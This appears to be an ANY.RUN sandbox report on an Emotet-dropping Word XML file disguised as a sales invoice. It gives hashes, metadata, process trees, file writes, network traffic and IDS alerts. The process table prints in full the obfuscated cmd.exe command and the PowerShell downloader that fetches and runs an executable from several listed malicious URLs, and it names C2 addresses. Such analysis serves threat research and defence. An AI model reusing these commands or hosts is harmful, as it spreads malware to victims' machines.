download: | Sales-Invoice |
Full analysis: | https://app.any.run/tasks/6f335336-6fae-42f2-beea-17bcc8a40d6f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 19:23:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 02AF2B2605265390740D1F6F615D1CB4 |
SHA1: | A20A20F3801276B628EF2C73BE7ABDD5C9DAB0A0 |
SHA256: | 7128E6E5E0516C991D67DDE86A8CA0A1D7AFAA529246C3D645E9445BE886E3E1 |
SSDEEP: | 3072:6uXLOI/PIwr8oAxJPjL/xSu90OoiLuDKZXfwKeljR1z:6u7r/PIwr8o2vxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 006F3A2D |
WordDocumentBodySectPRsidRDefault: | 00E9115B |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (Binary data, base64-encoded) |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 18:27:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 18:27:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
2672 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4032 | c:\w4662\q5040\j3357\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;6
9;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2668 | CmD /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F 
"delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2260 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $q2408='h9408';$v2775=new-object Net.WebClient;$i2123='http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7@http://find-me-an-english-penpal.find-me-an-english-tutor.co.uk/NQI8cCjpRB_qU@http://sarwa.co.za/KuPva1H8nR7WkoQ@http://3kiloafvallen.nl/X69XdvjZ5jBYL_QaTDlZM@http://www.tuneldeviento.es/efkhzi4/wAGCn2Hj6mEWaks'.Split('@');$o5230='t5399';$u3358 = '229';$u1063='a6254';$d135=$env:temp+'\'+$u3358+'.exe';foreach($c9354 in $i2123){try{$v2775.DownloadFile($c9354, $d135);$k6454='k9551';If ((Get-Item $d135).length -ge 40000) {Invoke-Item $d135;$s6537='o6665';break;}}catch{}}$s9738='r9891';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2360 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=fA tokens=1" %v IN ('ftype^|find "dfil"') DO %v " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2796 | C:\Windows\system32\cmd.exe /c ftype|find "dfil" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3020 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3112 | find "dfil" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3804 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA93.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40A705C3.jpg | — | |
MD5:— | SHA256:— | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ECTZ9ELPGYCOAITA1FN.temp | — | |
MD5:— | SHA256:— | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$les-Invoice.xml | pgc | |
MD5:99E051533F51AE11EAFC2F62C7E3CB17 | SHA256:A7E81903F3C01D299B4B33B6E3FC874E7FA4AC722A5E9E1A425088F6B91379A7 | |||
4072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\229.exe | executable | |
MD5:C9DDE1F9FC3CD405A9B8A2825B714474 | SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:CFDFD5601AC28A032639CE3B74E33DEC | SHA256:CFCBA30F388F7D8C809B3DC547D2989276AC30681A40467C4BB66D0B6461484A | |||
2820 | 229.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:C9DDE1F9FC3CD405A9B8A2825B714474 | SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:51841B3D88B50BFD73A91594DDA18C62 | SHA256:F7F45BAFD351A1E8BB642D6A8C100AC81042F4B7BB57C5D9F08083C2A55AFE9E | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fdbd.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4072 | powershell.exe | GET | 301 | 23.111.137.161:80 | http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7 | US | html | 254 b | suspicious |
3304 | wabmetagen.exe | GET | — | 206.248.110.184:8080 | http://206.248.110.184:8080/ | PR | — | — | malicious |
4072 | powershell.exe | GET | 200 | 23.111.137.161:80 | http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7/ | US | executable | 600 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3304 | wabmetagen.exe | 182.180.170.72:22 | — | Pakistan Telecom Company Limited | PK | suspicious |
3304 | wabmetagen.exe | 206.248.110.184:8080 | — | — | PR | malicious |
4072 | powershell.exe | 23.111.137.161:80 | durosfarm.com | HIVELOCITY VENTURES CORP | US | suspicious |
Domain | IP | Reputation |
---|---|---|
durosfarm.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
4072 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4072 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |